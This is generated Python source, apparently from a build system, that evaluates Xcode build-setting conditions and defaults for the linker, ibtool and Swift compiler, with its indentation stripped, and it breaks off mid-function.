def _com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_pbx_linkers_ld__LD_BITCODE_GENERATION_MODE__DefaultValue(xcconfigs, id_configs):
# $(BITCODE_GENERATION_MODE)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "BITCODE_GENERATION_MODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES && $(BITCODE_GENERATION_MODE) == bitcode
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "BITCODE_GENERATION_MODE"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "YES" and eval_val_1 == "bitcode"))
def _com_apple_pbx_linkers_ld__LD_VERIFY_BITCODE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES && $(BITCODE_GENERATION_MODE) == bitcode
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "BITCODE_GENERATION_MODE"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "YES" and eval_val_1 == "bitcode"))
def _com_apple_pbx_linkers_ld__LD_HIDE_BITCODE_SYMBOLS__DefaultValue(xcconfigs, id_configs):
# $(HIDE_BITCODE_SYMBOLS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "HIDE_BITCODE_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__Condition(xcconfigs, id_configs):
# $(ENABLE_BITCODE) == YES && $(BITCODE_GENERATION_MODE) == bitcode && $(MACH_O_TYPE) != mh_object
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_BITCODE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "BITCODE_GENERATION_MODE"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "MACH_O_TYPE"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, (eval_val_0 == "YES" and eval_val_1 == "bitcode" and eval_val_2 != "mh_object"))
def _com_apple_pbx_linkers_ld__LD_GENERATE_BITCODE_SYMBOL_MAP__DefaultValue(xcconfigs, id_configs):
# $(HIDE_BITCODE_SYMBOLS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "HIDE_BITCODE_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_THREAD_SANITIZER__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_THREAD_SANITIZER)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_THREAD_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__Condition(xcconfigs, id_configs):
# $(ENABLE_ADDRESS_SANITIZER) == YES || $(ENABLE_THREAD_SANITIZER) == YES || $(ENABLE_UNDEFINED_BEHAVIOR_SANITIZER) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_ADDRESS_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "ENABLE_THREAD_SANITIZER"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "ENABLE_UNDEFINED_BEHAVIOR_SANITIZER"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, (eval_val_0 == "YES" or eval_val_1 == "YES" or eval_val_2 == "YES"))
def _com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__Condition(xcconfigs, id_configs):
# $(DEPLOYMENT_POSTPROCESSING) == YES && $(SKIP_INSTALL) == NO && $(INSTALL_PATH) != ""
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEPLOYMENT_POSTPROCESSING"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SKIP_INSTALL"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "INSTALL_PATH"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, (eval_val_0 == "YES" and eval_val_1 == "NO" and eval_val_2 != ""))
def _com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__DefaultValue(xcconfigs, id_configs):
# $(INSTALL_PATH)/$(EXECUTABLE_PATH)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "INSTALL_PATH"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "EXECUTABLE_PATH"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_pbx_linkers_ld__LD_DEPENDENCY_INFO_FILE__DefaultValue(xcconfigs, id_configs):
# $(OBJECT_FILE_DIR_$(CURRENT_VARIANT))/$(CURRENT_ARCH)/$(PRODUCT_NAME)_dependency_info.dat
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CURRENT_VARIANT"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "CURRENT_ARCH"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "PRODUCT_NAME"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "OBJECT_FILE_DIR_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
return (used_user_content, "{eval_val_3}/{eval_val_1}/{eval_val_2}_dependency_info.dat".format(eval_val_3 = eval_val_3, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2))
def _com_apple_pbx_linkers_ld__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue(xcconfigs, id_configs):
# donothing
return (False, "donothing")
def _com_apple_pbx_linkers_ld__LD_DYLIB_ALLOWABLE_CLIENTS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__Condition(xcconfigs, id_configs):
# $(MACH_O_TYPE) != mh_object
used_user_content = False
eval_val_0 = ""
eval_key_0 = "MACH_O_TYPE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "mh_object"))
def _com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__DefaultValue(xcconfigs, id_configs):
# $(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $(OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "LD_FLAGS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SECTORDER_FLAGS"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "OTHER_LDFLAGS"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "variant"
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
eval_val_4 = ""
eval_key_4 = "arch"
if eval_key_4 in xcconfigs:
eval_val_4 = xcconfigs[eval_key_4]
used_user_content = True
elif eval_key_4 in id_configs:
opt = id_configs[eval_key_4]
if "DefaultValue" in opt:
(eval_val_4_used_user_content, eval_val_4) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_4_used_user_content
eval_val_5 = ""
eval_key_5 = "PRODUCT_SPECIFIC_LDFLAGS"
if eval_key_5 in xcconfigs:
eval_val_5 = xcconfigs[eval_key_5]
used_user_content = True
elif eval_key_5 in id_configs:
opt = id_configs[eval_key_5]
if "DefaultValue" in opt:
(eval_val_5_used_user_content, eval_val_5) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_5_used_user_content
eval_val_6 = ""
eval_key_6 = "OTHER_LDFLAGS_{eval_val_3}".format(eval_val_3 = eval_val_3)
if eval_key_6 in xcconfigs:
eval_val_6 = xcconfigs[eval_key_6]
used_user_content = True
elif eval_key_6 in id_configs:
opt = id_configs[eval_key_6]
if "DefaultValue" in opt:
(eval_val_6_used_user_content, eval_val_6) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_6_used_user_content
eval_val_7 = ""
eval_key_7 = "OTHER_LDFLAGS_{eval_val_4}".format(eval_val_4 = eval_val_4)
if eval_key_7 in xcconfigs:
eval_val_7 = xcconfigs[eval_key_7]
used_user_content = True
elif eval_key_7 in id_configs:
opt = id_configs[eval_key_7]
if "DefaultValue" in opt:
(eval_val_7_used_user_content, eval_val_7) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_7_used_user_content
eval_val_8 = ""
eval_key_8 = "OTHER_LDFLAGS_{eval_val_3}_{eval_val_4}".format(eval_val_3 = eval_val_3, eval_val_4 = eval_val_4)
if eval_key_8 in xcconfigs:
eval_val_8 = xcconfigs[eval_key_8]
used_user_content = True
elif eval_key_8 in id_configs:
opt = id_configs[eval_key_8]
if "DefaultValue" in opt:
(eval_val_8_used_user_content, eval_val_8) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_8_used_user_content
return (used_user_content, "{eval_val_0} {eval_val_1} {eval_val_2} {eval_val_6} {eval_val_7} {eval_val_8} {eval_val_5}".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2, eval_val_6 = eval_val_6, eval_val_7 = eval_val_7, eval_val_8 = eval_val_8, eval_val_5 = eval_val_5))
def _com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__Condition(xcconfigs, id_configs):
# $(MACH_O_TYPE) == mh_object
used_user_content = False
eval_val_0 = ""
eval_key_0 = "MACH_O_TYPE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "mh_object"))
def _com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__DefaultValue(xcconfigs, id_configs):
# $(OTHER_LDFLAGS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "OTHER_LDFLAGS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_ibtool_compiler__IBC_FLATTEN_NIBS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_ibtool_compiler__IBC_ERRORS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_ibtool_compiler__IBC_WARNINGS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_ibtool_compiler__IBC_NOTICES__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_ibtool_compiler__IBC_OTHER_FLAGS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_ibtool_compiler__IBC_PLUGINS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_ibtool_compiler__IBC_REGIONS_AND_STRINGS_FILES__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_ibtool_compiler__IBC_PLUGIN_SEARCH_PATHS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_ibtool_compiler__IBC_MODULE__DefaultValue(xcconfigs, id_configs):
# $(PRODUCT_MODULE_NAME)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "PRODUCT_MODULE_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_ibtool_compiler__build_file_compiler_flags__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_ibtool_compiler__XIB_COMPILER_INFOPLIST_CONTENT_FILE__DefaultValue(xcconfigs, id_configs):
# $(TARGET_TEMP_DIR)/$(InputFileRegionPathComponent)$(InputFileBase)-PartialInfo.plist
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TARGET_TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "InputFileRegionPathComponent"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "InputFileBase"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}{eval_val_2}-PartialInfo.plist".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2))
def _com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_AUTO_ACTIVATE_CUSTOM_FONTS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_USE_NIBARCHIVES_FOR_MACOS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_swift_compiler__SWIFT_EXEC__DefaultValue(xcconfigs, id_configs):
# swiftc
return (False, "swiftc")
def _com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARIES_ONLY__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_INCREMENTAL_COMPILATION__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_CROSS_MODULE_OPTIMIZATION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_PRECOMPILE_BRIDGING_HEADER__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WHOLE_MODULE_OPTIMIZATION__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WMO_TARGETS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_WHOLE_MODULE_OPTIMIZATION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARY_PATH__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_swift_compiler__SWIFT_MODULE_NAME__DefaultValue(xcconfigs, id_configs):
# $(PRODUCT_MODULE_NAME)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "PRODUCT_MODULE_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_BRIDGING_HEADER__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_INTERFACE_HEADER_NAME__DefaultValue(xcconfigs, id_configs):
# $(SWIFT_MODULE_NAME)-Swift.h
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_MODULE_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, "{eval_val_0}-Swift.h".format(eval_val_0 = eval_val_0))
def _com_apple_xcode_tools_swift_compiler__SWIFT_INSTALL_OBJC_HEADER__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_OPTIMIZATION_LEVEL__DefaultValue(xcconfigs, id_configs):
# -O
return (False, "-O")
def _com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__Condition(xcconfigs, id_configs):
# !$(SWIFT_WHOLE_MODULE_OPTIMIZATION) && $(SWIFT_OPTIMIZATION_LEVEL) != '-Owholemodule'
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_WHOLE_MODULE_OPTIMIZATION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_OPTIMIZATION_LEVEL"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 != "YES" and eval_val_1 != "-Owholemodule"))
def _com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__DefaultValue(xcconfigs, id_configs):
# singlefile
return (False, "singlefile")
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__Condition(xcconfigs, id_configs):
# !$(SWIFT_WHOLE_MODULE_OPTIMIZATION) && $(SWIFT_OPTIMIZATION_LEVEL) != '-Owholemodule' && $(SWIFT_COMPILATION_MODE) != 'wholemodule'
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_WHOLE_MODULE_OPTIMIZATION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
